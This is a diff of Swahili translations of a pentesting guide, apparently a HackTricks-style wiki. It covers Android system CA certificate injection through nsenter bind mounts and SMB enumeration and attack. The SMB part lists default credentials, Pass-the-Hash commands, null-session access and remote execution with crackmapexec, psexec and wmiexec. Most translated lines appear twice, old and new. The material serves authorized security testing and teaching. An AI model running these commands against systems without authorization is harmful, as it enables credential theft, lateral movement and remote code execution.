Hata hivyo, kuna njia mbadala kwa wale wanaohitaji kubadilisha CA certificates zinazoaminika na mfumo ndani ya saraka ya **`/apex`**. Hii inahusisha ku-remount kwa mkono **`/apex`** ili kuondoa PRIVATE propagation, na hivyo kuifanya iwe writable. Mchakato huo unajumuisha kunakili yaliyomo ya **`/apex/com.android.conscrypt`** hadi sehemu nyingine, ku-unmount saraka ya **`/apex/com.android.conscrypt`** ili kuondoa kikomo cha read-only, na kisha kurejesha yaliyomo kwenye mahali pake asilia ndani ya **`/apex`**. Njia hii inahitaji hatua za haraka ili kuepuka crash za mfumo. Ili kuhakikisha mabadiliko haya yanatumika kwenye mfumo mzima, inashauriwa kuwasha upya `system_server`, ambayo kwa ufanisi inarestart applications zote na kuleta mfumo katika hali thabiti.
```bash
# Create a separate temp directory, to hold the current certificates
# Otherwise, when we add the mount we can't read the current certs anymore.
@ -131,26 +131,26 @@ wait # Launched in parallel - wait for completion here
echo "System certificate injected"
```
### Bind-mounting through NSEnter
### Bind-mounting kupitia NSEnter
1. **Kuweka saraka inayoweza kuandikwa**: Awali, saraka inayoweza kuandikwa inaanzishwa kwa ku-mount `tmpfs` juu ya saraka ya vyeti ya mfumo non-APEX iliyopo. Hii inafikiwa kwa amri ifuatayo:
1. **Kusanidi Saraka Inayoweza Kuandikwa**: Awali, saraka inayoweza kuandikwa inaundwa kwa mounting ya `tmpfs` juu ya saraka ya vyeti ya mfumo ya non-APEX iliyopo. Hii inafikiwa kwa amri ifuatayo:
```bash
mount -t tmpfs tmpfs /system/etc/security/cacerts
```
2. **Kuandaa Vyeti vya CA**: Baada ya kuweka saraka inayoweza kuandikwa, vyeti vya CA ambavyo mtu anakusudia kutumia vinapaswa kunakiliwa katika saraka hii. Hii inaweza kuhusisha kunakili vyeti za default kutoka `/apex/com.android.conscrypt/cacerts/`. Ni muhimu kurekebisha ruhusa na lebo za SELinux za vyeti hivi ipasavyo.
3. **Bind Mounting for Zygote**: Kwa kutumia nsenter, mtu anaingia katika mount namespace ya Zygote. Zygote, kama mchakato unaehusika na kuanzisha programu za Android, anahitaji hatua hii ili kuhakikisha kwamba programu zote zinazozinduliwa kuanzia sasa zitumie vyeti vya CA vilivyosanidiwa upya. Amri inayotumika ni:
2. **Kutayarisha Vyeti vya CA**: Baada ya kuandaa directory inayoweza kuandikwa, vyeti vya CA ambavyo mtu anataka kutumia vinapaswa kunakiliwa ndani ya directory hii. Hii inaweza kuhusisha kunakili vyeti vya default kutoka `/apex/com.android.conscrypt/cacerts/`. Ni muhimu kurekebisha ruhusa na lebo za SELinux za vyeti hivi ipasavyo.
3. **Bind Mounting for Zygote**: Kwa kutumia `nsenter`, mtu anaingia kwenye mount namespace ya Zygote. Zygote, ikiwa ni mchakato unaehusika na kuanzisha programu za Android, inahitaji hatua hii ili kuhakikisha kwamba programu zote zitakazoanzishwa baadaye zinatumia vyeti vya CA vilivyosanidiwa hivi sasa. Amri inayotumika ni:
```bash
nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
Hii inahakikisha kwamba kila app mpya itakayozinduliwa itazingatia usanidi wa CA certificates uliosasishwa.
Hii inahakikisha kwamba kila app mpya itakayozinduliwa itafuata usanidi uliosasishwa wa vyeti vya CA.
4. **Kutekeleza Mabadiliko kwa Programu Zinazoendeshwa**: Ili kutekeleza mabadiliko kwa programu ambazo tayari zinaendeshwa, `nsenter` hutumika tena kuingia katika namespace ya kila app kibinafsi na kufanya bind mount sawa. Amri inayohitajika ni:
4. **Kutekeleza Mabadiliko kwa Programu Zinazoendesha**: Ili kutekeleza mabadiliko kwa programu ambazo tayari zinaendeshwa, `nsenter` inatumiwa tena kuingia kwenye namespace ya kila app mmoja mmoja na kufanya bind mount sawa. Amri inayohitajika ni:
```bash
nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
5. **Alternative Approach - Soft Reboot**: Njia mbadala inahusisha kufanya bind mount kwenye mchakato wa `init` (PID 1) ikifuatiwa na soft reboot ya mfumo wa uendeshaji kwa amri za `stop && start`. Njia hii itasambaza mabadiliko katika namespaces zote, ikiepuka haja ya kushughulikia kila app inayokimbia kimoja kwa kimoja. Hata hivyo, njia hii kwa ujumla haipendekeziwi kutokana na usumbufu wa kufanya reboot.
5. **Njia Mbadala - Soft Reboot**: Njia mbadala inahusisha kufanya bind mount kwenye `init` process (PID 1) ikifuatiwa na soft reboot ya mfumo wa uendeshaji kwa amri za `stop && start`. Njia hii itaeneza mabadiliko kwa namespaces zote, ikiepuka hitaji la kushughulikia kila app kimoja kimoja. Hata hivyo, njia hii kwa ujumla haipendekezwi kwa sababu ya usumbufu wa rebooting.
## Marejeo
## Marejeleo
- [Android 14: Install a system CA certificate on a rooted device](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)

170
src/network-services-pentesting/pentesting-smb/README.md
View File

@ -4,43 +4,43 @@
## **Port 139**
_**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na desktops ndani ya local area network (LAN) kuingiliana na vifaa vya mtandao na **kuwezesha usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na herufi hadi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (acting as the client) inatoa amri ya "call" kwa programu nyingine (acting as the server) ikitumia **TCP Port 139**.
The _**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya mtandao wa eneo la ndani (LAN) kuingiliana na vifaa vya mtandao na **kusaidia usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi katika mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa hadi herufi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (inayofanya kazi kama mteja) inatoa amri ya "kuita" programu nyingine (inayofanya kazi kama seva) kwa kutumia **TCP Port 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
Kiufundi, Port 139 inatajwa kama NBT over IP, wakati Port 445 inatambulika kama SMB over IP. Akronimu **SMB** inamaanisha **Server Message Blocks**, ambayo pia kwa sasa inajulikana kama **Common Internet File System (CIFS)**. Kwa kuwa ni protocol ya application-layer ya mtandao, SMB/CIFS hutumika hasa kuwezesha ufikiaji wa pamoja wa faili, vichapishi, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodi kwenye mtandao.
Kiufundi, Port 139 inarejelewa kama NBT over IP, huku Port 445 ikitambulika kama SMB over IP. Kifupi **SMB** kinamaanisha **Server Message Blocks**, ambayo pia kisasa inajulikana kama **Common Internet File System (CIFS)**. Kama itifaki ya mtandao katika safu ya programu, SMB/CIFS hutumiwa hasa kuwezesha upatikanaji wa pamoja wa faili, printa, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodes kwenye mtandao.
Kwa mfano, katika muktadha wa Windows, inabainishwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa uhitaji wa NetBIOS over TCP/IP, kwa kutumia port 445. Kinyume chake, kwenye mifumo mingine, matumizi ya port 139 yanaonekana, kuonyesha kwamba SMB inaendeshwa pamoja na NetBIOS over TCP/IP.
Kwa mfano, katika muktadha wa Windows, inaelezwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa hitaji la NetBIOS juu ya TCP/IP, kwa kutumia Port 445. Kinyume chake, kwenye mifumo tofauti, matumizi ya Port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa kwa kushirikiana na NetBIOS juu ya TCP/IP.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
Itifaki ya **Server Message Block (SMB)**, inayofanya kazi kwa muundo wa **client-server**, imeundwa kudhibiti **ufikiaji wa faili**, saraka, na rasilimali nyingine za mtandao kama vichapishaji na routers. Inatumiwa hasa ndani ya mfululizo wa mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vilivyo na matoleo mapya ya mfumo wa uendeshaji wa Microsoft kuingiliana bila mshono na vilivyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, likiwezesha utekelezaji wa SMB kwenye mifumo ya **Linux** na Unix, na hivyo kurahisisha mawasiliano ya majukwaa mbalimbali kupitia SMB.
The **Server Message Block (SMB)** protocol, operating in a **client-server** model, imeundwa kudhibiti **ufikiaji wa faili**, direktori, na rasilimali nyingine za mtandao kama printers na routers. Imetumika hasa ndani ya mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa Microsoft kuingiliana bila tatizo na vilivyo kwenye matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, kuruhusu utekelezaji wa SMB kwenye mifumo ya **Linux** na **Unix**, na hivyo kuwezesha mawasiliano ya cross-platform kupitia SMB.
Shares, zinazo wakilisha **sehemu yoyote ya mfumo wa faili wa ndani**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa mviringo uonyeshewe kwa mteja kwa sehemu **huru** kutoka kwa muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **haki za ufikiaji**, zinaruhusu **udhibiti wa kina** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kupewa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server.
Shares, zinazoonyesha **arbitrary parts of the local file system**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa hierarchy uonekane kwa mteja kwa namna inayokuwa kwa sehemu **independent** na muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **access rights**, zinaruhusu **fine-grained control** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kutolewa kwa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server.
### IPC$ Share
Ufikiaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. Utility `enum4linux` ni muhimu kwa madhumuni haya. Ikiwa itatumika vizuri, inaruhusu kupata:
Ufikiaji wa share ya IPC$ unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. Utility ya `enum4linux` ni muhimu kwa madhumuni haya. Ikiotumika ipasavyo, inaruhusu upokezi wa:
- Taarifa kuhusu mfumo wa uendeshaji
- Maelezo kuhusu domain ya mzazi
- Maelezo juu ya parent domain
- Orodha ya watumiaji na vikundi vya ndani
- Taarifa kuhusu SMB shares zilizopo
- Sera ya usalama ya mfumo inayotekelezeka
- Taarifa juu ya SMB shares zinazopatikana
- Sera ya usalama ya mfumo inayotekelezwa
Kazi hii ni muhimu kwa wasimamizi wa mtandao na wataalam wa usalama kutathmini hali ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaowezekana na kuhakikisha kuwa huduma za SMB zimewekwa salama ipasavyo.
Uwezo huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini nafasi ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaoweza kuwepo na kuhakikisha kwamba huduma za SMB zimetunzwa ipasavyo.
```bash
enum4linux -a target_ip
```
Amri iliyotangulia ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya lengo lililobainishwa na `target_ip`.
Amri hapo juu ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya target iliyobainishwa kama `target_ip`.
## NTLM ni nini
Kama haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana ambapo umeelezwa **jinsi protocol hii inavyofanya kazi na jinsi unavyoweza kuinufaisha:**
Ikiwa haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana, ambapo umeelezewa **jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kuitumia kwa faida:**
{{#ref}}
../../windows-hardening/ntlm/
@ -52,12 +52,12 @@ Kama haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kui
```bash
nbtscan -r 192.168.0.1/24
```
### Toleo la server la SMB
### Toleo la seva la SMB
Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haitokei katika zana nyingine ulizotumia, unaweza:
Ili kutafuta exploits zinazowezekana kwa toleo la SMB ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haionekani katika zana nyingine zinazotumika, unaweza:
- Tumia **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
- Ama script hii:
- Au skripti hii:
```bash
#!/bin/sh
#Author: rewardone
@ -74,18 +74,18 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Tafuta exploit**
### **Utafutaji wa exploit**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Inawezekana** Credentials
### **Vinavyowezekana** Vyeti
| **Username(s)** | **Common passwords** |
| -------------------- | ----------------------------------------- |
| _(blank)_ | _(blank)_ |
| guest | _(blank)_ |
| Administrator, admin | _(blank)_, password, administrator, admin |
| **Jina la Mtumiaji(s)** | **Manenosiri ya kawaida** |
| ----------------------- | --------------------------------------- |
| _(bure)_ | _(bure)_ |
| guest | _(bure)_ |
| Administrator, admin | _(bure)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
@ -119,9 +119,9 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Orodhesha Watumiaji, Makundi & Watumiaji Walioingia
### Orodhesha Watumiaji, Vikundi & Watumiaji Waliyeingia
Taarifa hizi zinapaswa tayari kuwa zimekusanywa kutoka enum4linux na enum4linux-ng
Taarifa hizi zinapaswa tayari kuwa zimekusanywa na enum4linux na enum4linux-ng
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
@ -139,11 +139,11 @@ enumdomgroups
```bash
lookupsid.py -no-pass hostname.local
```
Mstari mmoja
Oneliner
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - Enumerate watumiaji wa ndani
### Metasploit - Orodhesha watumiaji wa ndani
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
@ -156,21 +156,21 @@ run
rpcclient-enumeration.md
{{#endref}}
### Muunganisho wa GUI kutoka linux
### GUI connection from linux
#### Kwenye terminali:
#### Katika terminal:
`xdg-open smb://cascade.htb/`
#### Katika dirisha la kivinjari cha faili (nautilus, thunar, etc)
#### Katika file browser window (nautilus, thunar, etc)
`smb://friendzone.htb/general/`
## Kuorodhesha Folda Zilizoshirikishwa
## Uorodhesha wa Folda Zilizoshirikiwa
### Orodhesha folda ziloshirikishwa
### Orodhesha folda zilizoshirikiwa
Inashauriwa kila wakati kuangalia ikiwa unaweza kupata chochote, ikiwa huna credentials jaribu kutumia **null** **credentials/guest user**.
Inashauriwa kila wakati kuangalia kama unaweza kupata chochote; ikiwa huna credentials, jaribu kutumia **null** **credentials/guest user**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -196,13 +196,13 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Hesabu kwa mkono windows shares na kujiunga nazo**
### **Orodhesha kwa mikono windows shares na kujiunga nazo**
Inawezekana umezuiliwa kuonyesha shares zozote za mashine ya mwenyeji na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna shares za kuunganishwa. Kwa hivyo inaweza kuwa vyema kujaribu kwa haraka kuunganishwa kwa mkono na share.
Inawezekana kwamba umezuiwa kuonyesha shares zozote za mashine mwenyeji, na unapojaribu kuziorodhesha inaonekana kama hakuna shares za kuunganishwa nazo. Kwa hivyo inaweza kufaa kujaribu kwa muda mfupi kuunganishwa kwa mikono kwenye share.
Ili kuhesabu shares kwa mkono unaweza kutaka kutazama majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, wakati unatumia session halali (mf. null session au valid credentials). Hizi zinaweza kuonyesha kama share ipo na huna ufikiaji kwake au share haipo kabisa.
Ili kuorodhesha shares kwa mikono unaweza kutaka kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, unapotumia valid session (mfano null session or valid credentials). Hii inaweza kuonyesha ikiwa share ipo na wewe huna ufikiaji wake, au share haipo kabisa.
Majina ya shares ya kawaida kwa targets za Windows ni
Common share names for windows targets are
- C$
- D$
@ -213,9 +213,9 @@ Majina ya shares ya kawaida kwa targets za Windows ni
- SYSVOL
- NETLOGON
(Common share names from _**Network Security Assessment 3rd edition**_)
(Majina ya kawaida ya shares kutoka _**Network Security Assessment 3rd edition**_)
Unaweza kujaribu kujiunga nao kwa kutumia amri ifuatayo
Unaweza kujaribu kuunganishwa nazo kwa kutumia amri ifuatayo
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
@ -242,7 +242,7 @@ mifano
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Orodhesha shares kutoka Windows / bila zana za pande za tatu**
### **Orodhesha shares kutoka Windows / bila zana za mtu wa tatu**
PowerShell
```bash
@ -261,23 +261,23 @@ net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC Snap-in (grafiki)
MMC Snap-in (ya grafiki)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona shares zisizo zilizofichwa zinazopatikana.
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona shares zisizofichwa zinazopatikana.
### Unganisha folda iliyoshirikiwa
### Unganisha shared folder
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Pakua faili**
### **Pakua mafaili**
Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash.
Soma sehemu zilizopita ili ujifunze jinsi ya kuunganishwa kwa kutumia credentials/Pass-the-Hash.
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
@ -292,16 +292,16 @@ smbclient //<IP>/<share>
> mget *
#Download everything to current directory
```
Amri:
Commands:
- mask: inaeleza mask ambayo inatumika kuchuja faili ndani ya saraka (e.g. "" for all files)
- recurse: huweka au huzima recursion (chaguo-msingi: off)
- prompt: huweka au huzima prompt ya majina ya faili (chaguo-msingi: on)
- mget: inakopa faili zote zinazolingana na mask kutoka host kwenda client machine
- mask: inabainisha mask inayotumika kuchuja faili ndani ya saraka (kwa mfano "" kwa faili zote)
- recurse: hubadilisha recursion kuwa imewezeshwa (chaguo-msingi: imezimwa)
- prompt: hugeuza kuulizwa kwa majina ya faili (chaguo-msingi: imewezeshwa)
- mget: kunakili faili zote zinazolingana na mask kutoka kwenye host kwenda kwenye client machine
(_Taarifa kutoka kwenye manpage ya smbclient_)
### Utafutaji wa Folda Zilizoshirikiwa za Domain
### Utafutaji wa Folda Zinazoshirikiwa za Domain
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
@ -313,15 +313,15 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
Chini ya shares, zinazovutia hasa ni mafaili yanayoitwa **`Registry.xml`**, kwa kuwa zinaweza kuwa na **passwords** za watumiaji waliowekwa na **autologon** kupitia **Group Policy**. Pia mafaili ya **`web.config`** yanaweza kuwa na **credentials**.
> [!TIP]
> Sehemu ya **SYSVOL share** inaweza kusomwa na watumiaji wote walioidhinishwa ndani ya domain. Ndani yake unaweza **kupata** aina nyingi za batch, VBScript, na PowerShell **scripts**.\
> Unapaswa **kuangalia** **scripts** zilizomo ndani yake kwani unaweza **kupata** taarifa nyeti kama **passwords**.
> The **SYSVOL share** inasomeka na watumiaji wote waliothibitishwa kwenye domain. Huko unaweza **find** batch tofauti, VBScript, na PowerShell **scripts**.\
> Unapaswa **check** **scripts** zilizomo ndani yake kwani unaweza **find** taarifa nyeti kama **passwords**.
## Soma Registry
Unaweza kuwa na uwezo wa **kusoma registry** ukitumia credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu:
Unaweza kuwa na uwezo wa **read the registry** kwa kutumia baadhi ya credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
@ -329,35 +329,35 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
```
## Post Exploitation
**Mpangilio chaguo-msingi** cha **Samba** seva kwa kawaida hupatikana katika `/etc/samba/smb.conf` na linaweza kuwa na baadhi ya **mpangilio hatari**:
Usanidi wa **chaguo-msingi** wa seva ya **Samba** kwa kawaida upo katika `/etc/samba/smb.conf` na unaweza kuwa na baadhi ya **usanidi hatari**:
| **Mpangilio** | **Maelezo** |
| **Mipangilio** | **Maelezo** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Je, inaruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? |
| `read only = no` | Je, inazuia uundaji na mabadiliko ya faili? |
| `writable = yes` | Je, inaruhusu watumiaji kuunda na kubadilisha faili? |
| `guest ok = yes` | Je, inaruhusu kuunganishwa na huduma bila kutumia nywila? |
| `enable privileges = yes` | Je, inaheshimu privileges zilizotengwa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani zinapaswa kupewa faili zilizoundwa hivi karibuni? |
| `directory mask = 0777` | Ni ruhusa gani zinapaswa kupewa saraka zilizoundwa hivi karibuni? |
| `browseable = yes` | Kuruhusu kuorodhesha shares zinazopatikana? |
| `read only = no` | Kuzuia uundaji na uhariri wa faili? |
| `writable = yes` | Kuruhusu watumiaji kuunda na kuhariri faili? |
| `guest ok = yes` | Kuruhusu kuunganishwa na huduma bila kutumia nenosiri? |
| `enable privileges = yes` | Kuheshimu vibali vilivyotolewa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa faili mpya zinazoundwa? |
| `directory mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa saraka mpya? |
| `logon script = script.sh` | Ni script gani inapaswa kutekelezwa wakati wa kuingia kwa mtumiaji? |
| `magic script = script.sh` | Ni script gani inapaswa kutekelezwa wakati script inapofungwa? |
| `magic output = script.out` | Wapi pato la magic script linapaswa kuhifadhiwa? |
| `magic script = script.sh` | Script gani inapaswa kutekelezwa script inapofungwa? |
| `magic output = script.out` | Wapi matokeo ya magic script yanapaswa kuhifadhiwa? |
Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **ni nani ameunganishwa**.
Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **nani ameunganishwa**.
## Thibitisha kwa kutumia Kerberos
Unaweza **kuthibitisha** kwa **kerberos** kwa kutumia zana **smbclient** na **rpcclient**:
Unaweza **kuthibitisha** kwa **Kerberos** ukitumia zana **smbclient** na **rpcclient**:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **Tekeleza Amri**
## **Endesha Amri**
### **crackmapexec**
crackmapexec inaweza kutekeleza amri **ikitumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo mbinu ya **default**. Unaweza kuonyesha chaguo unalopendelea kutumia kwa kigezo `--exec-method`:
crackmapexec inaweza kutekeleza amri kwa **kutumia** mojawapo ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo njia ya **chaguo-msingi**. Unaweza kubainisha ni chaguo gani unazopendelea kutumia kwa kipengeo `--exec-method`:
```bash
apt-get install crackmapexec
@ -381,8 +381,8 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
Chaguzi zote mbili zitatengeneza **huduma mpya** (kutumia _\pipe\svcctl_ via SMB) kwenye mashine ya mwathiriwa na kuitumia **kutekeleza kitu** (**psexec** ita **upload** executable file kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka katika arguments the payload --**file-less technique-**-).\
**Maelezo zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Chaguzi zote mbili zitaunda **service mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathiri na kuitumia **kutekeleza kitu** (**psexec** itafanya **upload** faili inayotekelezeka kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka kwenye arguments payload --**file-less technique-**-).\
**Taarifa zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
@ -391,19 +391,19 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Kwa kutumia **parameter**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
Kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM**
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
Endesha kwa siri command shell bila kugusa disk au kuendesha service mpya kwa kutumia DCOM kupitia **port 135.**\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
Endesha kwa siri shell ya amri bila kugusa diski au kuendesha huduma mpya ukitumia DCOM kupitia **port 135.**\
Katika **kali** inapatikana kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Kwa kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM**
Kwa kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
@ -412,7 +412,7 @@ Kwa kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala
```
